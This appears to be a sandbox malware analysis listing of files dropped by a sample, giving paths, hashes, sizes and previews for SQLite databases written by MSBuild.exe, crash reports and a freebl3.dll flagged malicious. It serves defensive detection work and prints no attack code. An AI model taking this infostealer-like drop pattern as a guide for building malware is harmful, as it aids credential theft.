                                                                                                                                                                                                                    C:\ProgramData\JJDBAEHIJKJK\GCFBAK

                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                    Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                                                                                                                                                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 25, cookie 0xe, schema 4, UTF-8, version-valid-for 1
                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                    Size (bytes):51200
                                                                                                                                                                                                                    Entropy (8bit):0.8746135976761988
                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                    SSDEEP:96:O8mmwLCn8MouB6wzFlOqUvJKLReZff44EK:O8yLG7IwRWf4
                                                                                                                                                                                                                    MD5:9E68EA772705B5EC0C83C2A97BB26324
                                                                                                                                                                                                                    SHA1:243128040256A9112CEAC269D56AD6B21061FF80
                                                                                                                                                                                                                    SHA-256:17006E475332B22DB7B337F1CBBA285B3D9D0222FD06809AA8658A8F0E9D96EF
                                                                                                                                                                                                                    SHA-512:312484208DC1C35F87629520FD6749B9DDB7D224E802D0420211A7535D911EC1FA0115DC32D8D1C2151CF05D5E15BBECC4BCE58955CFFDE2D6D5216E5F8F3BDF
                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                    Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                    C:\ProgramData\JJDBAEHIJKJK\GIJEGD

                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                    Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                                                                                                                                                                                    File Type:SQLite 3.x database, user version 12, last written using SQLite version 3042000, page size 32768, writer version 2, read version 2, file counter 3, database pages 3, cookie 0x1, schema 4, UTF-8, version-valid-for 3
                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                    Size (bytes):98304
                                                                                                                                                                                                                    Entropy (8bit):0.08235737944063153
                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                    SSDEEP:12:DQAsfWk73Fmdmc/OPVJXfPNn43etRRfYR5O8atLqxeYaNcDakMG/lO:DQAsff32mNVpP965Ra8KN0MG/lO
                                                                                                                                                                                                                    MD5:369B6DD66F1CAD49D0952C40FEB9AD41
                                                                                                                                                                                                                    SHA1:D05B2DE29433FB113EC4C558FF33087ED7481DD4
                                                                                                                                                                                                                    SHA-256:14150D582B5321D91BDE0841066312AB3E6673CA51C982922BC293B82527220D
                                                                                                                                                                                                                    SHA-512:771054845B27274054B6C73776204C235C46E0C742ECF3E2D9B650772BA5D259C8867B2FA92C3A9413D3E1AD35589D8431AC683DF84A53E13CDE361789045928
                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                    Preview:SQLite format 3......@ ..........................................................................j......}..}...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                    C:\ProgramData\JJDBAEHIJKJK\GIJEGD-shm

                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                    Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                    Size (bytes):32768
                                                                                                                                                                                                                    Entropy (8bit):0.017262956703125623
                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                    SSDEEP:3:G8lQs2TSlElQs2TtPRp//:G0QjSaQjrpX
                                                                                                                                                                                                                    MD5:B7C14EC6110FA820CA6B65F5AEC85911
                                                                                                                                                                                                                    SHA1:608EEB7488042453C9CA40F7E1398FC1A270F3F4
                                                                                                                                                                                                                    SHA-256:FD4C9FDA9CD3F9AE7C962B0DDF37232294D55580E1AA165AA06129B8549389EB
                                                                                                                                                                                                                    SHA-512:D8D75760F29B1E27AC9430BC4F4FFCEC39F1590BE5AEF2BFB5A535850302E067C288EF59CF3B2C5751009A22A6957733F9F80FA18F2B0D33D90C068A3F08F3B0
                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                    Preview:..-.....................................8...5.....-.....................................8...5...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                    C:\ProgramData\JJDBAEHIJKJK\HCAEHD

                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                    Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                                                                                                                                                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                    Size (bytes):106496
                                                                                                                                                                                                                    Entropy (8bit):1.1373607036346451
                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                    SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c9G/k4:MnlyfnGtxnfVuSVumEHUM4
                                                                                                                                                                                                                    MD5:64BCCF32ED2142E76D142DF7AAC75730
                                                                                                                                                                                                                    SHA1:30AB1540F7909BEE86C0542B2EBD24FB73E5D629
                                                                                                                                                                                                                    SHA-256:B274913369030CD83E1C76E8D486F501E349D067824C6A519F2DAB378AD0CC09
                                                                                                                                                                                                                    SHA-512:0C2B4FC0D38F97C8411E1541AB15B78C57FEA370F02C17F8CB26101A936F19E636B02AF1DF2A62C8EAEE6B785FE17879E2723D8618C9C3C8BD11EB943BA7AB31
                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                    Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                    C:\ProgramData\JJDBAEHIJKJK\IIJJDG

                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                    Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                                                                                                                                                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 7, database pages 5, cookie 0x5, schema 4, UTF-8, version-valid-for 7
                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                    Size (bytes):20480
                                                                                                                                                                                                                    Entropy (8bit):0.6732424250451717
                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                    SSDEEP:24:TLO1nKbXYFpFNYcoqT1kwE6UwpQ9YHVXxZ6HfB:Tq1KLopF+SawLUO1Xj8B
                                                                                                                                                                                                                    MD5:CFFF4E2B77FC5A18AB6323AF9BF95339
                                                                                                                                                                                                                    SHA1:3AA2C2115A8EB4516049600E8832E9BFFE0C2412
                                                                                                                                                                                                                    SHA-256:EC8B67EF7331A87086A6CC085B085A6B7FFFD325E1B3C90BD3B9B1B119F696AE
                                                                                                                                                                                                                    SHA-512:0BFDC8D28D09558AA97F4235728AD656FE9F6F2C61DDA2D09B416F89AB60038537B7513B070B907E57032A68B9717F03575DB6778B68386254C8157559A3F1BC
                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                    Preview:SQLite format 3......@ ..........................................................................j...$......g..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                    C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_CBFCFBFBFB.exe_dc97fc91233dc875f6b4e4fb767c1c44d31d15cc_45f160d2_cebbf0a7-e1d0-4076-98e3-b5c971e63e95\Report.wer

                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                    Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                    File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                    Size (bytes):65536
                                                                                                                                                                                                                    Entropy (8bit):0.7044361919037112
                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                    SSDEEP:96:d+bqF0y4ssdhqVoI7RB6tQXIDcQvc6QcEVcw3cE/3+HbHg/8BRTf3Oy1FhZAX/dU:rT4szD0BU/Qju1zuiFFZ24IO8b
                                                                                                                                                                                                                    MD5:1EC39636F364607B3F475FC918B8CE39
                                                                                                                                                                                                                    SHA1:2BB80B48EA0BC9FC0F0B932A33A6CF31CD7FA492
                                                                                                                                                                                                                    SHA-256:47A45A304198444596AEE04A25F5F75F4BB4F183A30F806E6E0B88010CEA1C11
                                                                                                                                                                                                                    SHA-512:0127AC9D6A6905D72B421B141D4444E9A98A1E36B4BF8085EEA8CA5C859C84A33165DD202F9D351F889A6C0E12B46658528C28D296C60C5F5FFD608EB4454A7A
                                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                                    Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.B.E.X.....E.v.e.n.t.T.i.m.e.=.1.3.3.7.2.4.3.4.9.1.7.9.8.3.5.2.6.9.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.7.2.4.3.4.9.1.8.2.6.4.7.9.1.2.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.c.e.b.b.f.0.a.7.-.e.1.d.0.-.4.0.7.6.-.9.8.e.3.-.b.5.c.9.7.1.e.6.3.e.9.5.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.2.0.9.1.0.3.0.1.-.6.8.e.b.-.4.4.0.f.-.9.e.4.7.-.3.3.d.b.1.0.0.7.6.d.8.8.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.C.B.F.C.F.B.F.B.F.B...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.0.3.8.4.-.0.0.0.1.-.0.0.1.4.-.4.a.1.d.-.b.a.4.9.9.6.1.5.d.b.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.d.8.5.b.b.c.c.0.b.d.0.8.7.f.8.7.f.6.6.2.c.e.e.3.e.f.1.7.9.6.2.8.0.0.0.0.f.f.f.f.!.0.0.0.0.b.b.6.c.b.f.c.6.e.f.0.7.c.8.e.e.1.f.2.8.7.f.3.b.e.5.6.9.0.d.0.f.f.a.5.a.c.9.e.a.!.C.B.F.C.F.B.F.B.F.B...e.x.e.....T.a.r.g.e.t.A.p.p.V.e.r.=.2.

                                                                                                                                                                                                                    C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_file.exe_6d926f6c9da85a293d58c3cb45a16c531c4372_bfb0bb6b_780bf0d2-10e6-4629-ae6d-e52283072cc2\Report.wer

                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                    Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                    File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                    Size (bytes):65536
                                                                                                                                                                                                                    Entropy (8bit):0.699272694338223
                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                    SSDEEP:192:lNQAqvFPlc0BU/MT3ju1zuiFrZ24IO8kSB:cFNXBU/wjczuiFrY4IO8L
                                                                                                                                                                                                                    MD5:DAAB52D2F1E83D4BD2588453785ADE06
                                                                                                                                                                                                                    SHA1:EBEA35B02F2606C49D8585815E58B78594F143AF
                                                                                                                                                                                                                    SHA-256:51373135C2EE8D2686B660B761405F2ADC671E4A9A72E1C4B4A6BE0BEBB69E1A
                                                                                                                                                                                                                    SHA-512:BBD38712C7492BEE860BBFE71BFEA8F0BDD145B6EA918CB610FCA2696754DB62F8D8A159D8122B72F6F349047ECF44D8F08A08ECFEBD7BFFA062ADF2348E1AA7
                                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                                    Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.B.E.X.....E.v.e.n.t.T.i.m.e.=.1.3.3.7.2.4.3.4.8.4.6.9.7.3.8.4.1.6.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.7.2.4.3.4.8.4.8.0.9.8.8.5.3.1.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.7.8.0.b.f.0.d.2.-.1.0.e.6.-.4.6.2.9.-.a.e.6.d.-.e.5.2.2.8.3.0.7.2.c.c.2.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.b.c.1.3.2.7.7.4.-.7.d.c.b.-.4.6.4.2.-.9.b.c.b.-.f.a.8.c.5.e.6.4.b.9.7.4.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.f.i.l.e...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.0.e.3.4.-.0.0.0.1.-.0.0.1.4.-.d.0.4.2.-.f.8.1.f.9.6.1.5.d.b.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.7.e.4.9.2.d.7.6.8.e.7.9.7.3.1.6.2.4.b.c.d.f.2.e.7.6.1.5.f.9.1.8.0.0.0.0.f.f.f.f.!.0.0.0.0.7.c.e.5.1.f.e.b.0.e.8.1.8.f.5.a.c.b.6.b.a.4.f.1.d.e.b.9.f.4.f.e.f.0.4.d.7.c.d.6.!.f.i.l.e...e.x.e.....T.a.r.g.e.t.A.p.p.V.e.r.=.2.0.2.4././.1.0././.0.3.:.

                                                                                                                                                                                                                    C:\ProgramData\Microsoft\Windows\WER\Temp\WER48BE.tmp.dmp

                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                    Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                    File Type:Mini DuMP crash report, 14 streams, Thu Oct 3 13:14:07 2024, 0x1205a4 type
                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                    Size (bytes):35612
                                                                                                                                                                                                                    Entropy (8bit):1.7193407298282355
                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                    SSDEEP:96:5U8sJP+WqHWKhkrjnXs2ti73V+RkyHRQ1SUBxdjWIdWI8VIYjRpoZzB7ctNsnd:xsJmqvTtOSRQ1Saxd4jRp+zB7cQ
                                                                                                                                                                                                                    MD5:6E8AB42CAE05D404375BAB87E06B2BFC
                                                                                                                                                                                                                    SHA1:263EE868457F48DF5B3A381EFB531C4CB8610F48
                                                                                                                                                                                                                    SHA-256:0260F6FDA8DC8617ABFCE3370C1890E4880F5FD9A0A15B2869D16884FA9ED7BE
                                                                                                                                                                                                                    SHA-512:37FF1AE17878F53701FA52644E83D81538EBD0D4A2B4CF8EA4761FF31FCE29D625EBB4BFB335494B1C984C7B490AEB1E627E8DD869CC867F4767E4DC8D43C995
                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                    Preview:MDMP..a..... ..........f........................X...............N...........T.......8...........T................~......................................................................................................eJ......x.......GenuineIntel............T.......4......f.............................0..............,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6...................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                    C:\ProgramData\Microsoft\Windows\WER\Temp\WER4999.tmp.WERInternalMetadata.xml

                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                    Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                    File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                    Size (bytes):8374
                                                                                                                                                                                                                    Entropy (8bit):3.6953425192257026
                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                    SSDEEP:192:R6l7wVeJoCm6r6YSfSU98QNGgmf6hgprJ89bmbGsf3gjm:R6lXJu6r6YKSU94gmfwTmblfw6
                                                                                                                                                                                                                    MD5:242FF77C82FF5A08EAD6395457CB79CF
                                                                                                                                                                                                                    SHA1:C850B8EEBD457914C0140CFCB500F797192D39B3
                                                                                                                                                                                                                    SHA-256:4CFA249F1907DF254609BC505E7F637E1BDC2C28EF95DA28B422792898C79D34
                                                                                                                                                                                                                    SHA-512:8D29B42B540434DE53DADB9F28EF6FBF432E5F14A54448C8F52D013C90B31AD357288C9D9658AEBC07044AAFD04B483162A2533E5D25E1F0D47E45058BAC1CD1
                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                    Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.3.6.3.6.<./.P.i.

                                                                                                                                                                                                                    C:\ProgramData\Microsoft\Windows\WER\Temp\WER4A75.tmp.xml

                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                    Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                    File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                    Size (bytes):4690
                                                                                                                                                                                                                    Entropy (8bit):4.460245178130973
                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                    SSDEEP:48:cvIwWl8zseX6Jg77aI9dSWpW8VYXYm8M4Js5FaKy+q8vPk04hhQd:uIjfFI7Lz7VPJEyKM04hhQd
                                                                                                                                                                                                                    MD5:FC43B11C5E1D9878DE95DEA461FB82C6
                                                                                                                                                                                                                    SHA1:203E4715565A47302F5EDCD8257A00EE92F19AED
                                                                                                                                                                                                                    SHA-256:99B77060CBBC6D5718B26CF16DEA2869585E5BE1ABB48317F61CCA8A35C884B5
                                                                                                                                                                                                                    SHA-512:95F46D40521CAF4072C8A15D6E703A43DA0207FD3973BF853A64A02171B8E4062DFFDD4F7B5DAAB4900AB6DEE0FB12FF004BC55F1302D009BE6C94D45F0F7D82
                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                    Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="527296" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409

                                                                                                                                                                                                                    C:\ProgramData\Microsoft\Windows\WER\Temp\WER5E06.tmp.dmp

                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                    Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                    File Type:Mini DuMP crash report, 14 streams, Thu Oct 3 13:15:18 2024, 0x1205a4 type
                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                    Size (bytes):35200
                                                                                                                                                                                                                    Entropy (8bit):1.7645649445415315
                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                    SSDEEP:96:5F8telNvmrm2LVs42XE0hi73QK7dDvOanO5M1xKEA7WIkWI5AQLSCoDreVeZjluq:QYdo6OnxzaM1ogSXDreVUl/
                                                                                                                                                                                                                    MD5:D3F37597875DBACCC0F3E7CB7497F76B
                                                                                                                                                                                                                    SHA1:D8567F7094E42CC7EB25B41AEA1BB00209144838
                                                                                                                                                                                                                    SHA-256:68F4CFF3936B4913E070A35D90149461CC8D88CAF74236F47C5F7CFF3E5032D5
                                                                                                                                                                                                                    SHA-512:1B31CB37E5560899E580C0C9E9985A4E97EC3067326C81A4028D57ACA870DB16AF8821B5C138CB4F6BF7F3D81D071750FAB7200AB33580CA492DEAB45724D237
                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                    Preview:MDMP..a..... .........f........................X...............Z...........T.......8...........T................|......................................................................................................eJ......x.......GenuineIntel............T.............f.............................0..............,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6...................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                    C:\ProgramData\Microsoft\Windows\WER\Temp\WER5E46.tmp.WERInternalMetadata.xml

                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                    Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                    File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                    Size (bytes):8398
                                                                                                                                                                                                                    Entropy (8bit):3.702040278883158
                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                    SSDEEP:192:R6l7wVeJoz6S6Ybz6begmf7gpr989brqsflZm:R6lXJ86S6Yf6begmf7HrJfS
                                                                                                                                                                                                                    MD5:A3B9A6E02523EAA283BF4555A8F0404E
                                                                                                                                                                                                                    SHA1:1044CE0A6027A8C1581CDC2F1FCAC0B590B36C81
                                                                                                                                                                                                                    SHA-256:B191060DE377CA5E844CA3DCDC8FAC08A935446935DECE6508DF4F0022CA456E
                                                                                                                                                                                                                    SHA-512:2CA127157387B5687F2081BCE6D8B6EA29EB9ABC41171FED3972CBBD1C1093B49601CADB0B105919D7F8922B7E4197CE2B912E74855868C5B51FE5EC10A8B539
                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                    Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.9.0.0.<./.P.i.d.

                                                                                                                                                                                                                    C:\ProgramData\Microsoft\Windows\WER\Temp\WER5EA4.tmp.xml

                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                    Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                    File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                    Size (bytes):4720
                                                                                                                                                                                                                    Entropy (8bit):4.491506652013872
                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                    SSDEEP:48:cvIwWl8zseXRJg77aI9dSWpW8VYSYm8M4Jx5Fl+q8vGaN/IKld:uIjfaI7Lz7VWJ7KxNgKld
                                                                                                                                                                                                                    MD5:E44DA4B571A68E0F061DE1A4CC8106B3
                                                                                                                                                                                                                    SHA1:58973A7AFCC410DD3AB8EBE5914A21668925031E
                                                                                                                                                                                                                    SHA-256:ACA4ECE86514EC1AD8EA9C85C3A80162126E2EE4A85807202FE6CD290F083DCA
                                                                                                                                                                                                                    SHA-512:51BAC9CE54783F4E703326413A985ADA63A9EAAEB7316396CF9C3FB178C02354ACEFAAD3C2242CB8831B6310DA495386770897E404D2A4A8EFDF2639C1FD0DAD
                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                    Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="527297" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409

                                                                                                                                                                                                                    C:\ProgramData\freebl3.dll

                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                    Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                                                                                                                                                                                    File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                    Size (bytes):685392
                                                                                                                                                                                                                    Entropy (8bit):6.872871740790978
                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                    SSDEEP:12288:4gPbPpxMofhPNN0+RXBrp3M5pzRN4l2SQ+PEu9tUs/abAQb51FW/IzkOfWPO9UN7:4gPbPp9NNP0BgInfW2WMC4M+hW
                                                                                                                                                                                                                    MD5:550686C0EE48C386DFCB40199BD076AC
                                                                                                                                                                                                                    SHA1:EE5134DA4D3EFCB466081FB6197BE5E12A5B22AB
                                                                                                                                                                                                                    SHA-256:EDD043F2005DBD5902FC421EABB9472A7266950C5CBACA34E2D590B17D12F5FA
                                                                                                                                                                                                                    SHA-512:0B7F47AF883B99F9FBDC08020446B58F2F3FA55292FD9BC78FC967DD35BDD8BD549802722DE37668CC89EDE61B20359190EFBFDF026AE2BDC854F4740A54649E
                                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                                    Antivirus:
                                                                                                                                                                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                    Joe Sandbox View:
                                                                                                                                                                                                                    • Filename: file.exe, Detection: malicious, Browse
                                                                                                                                                                                                                    • Filename: file.exe, Detection: malicious, Browse
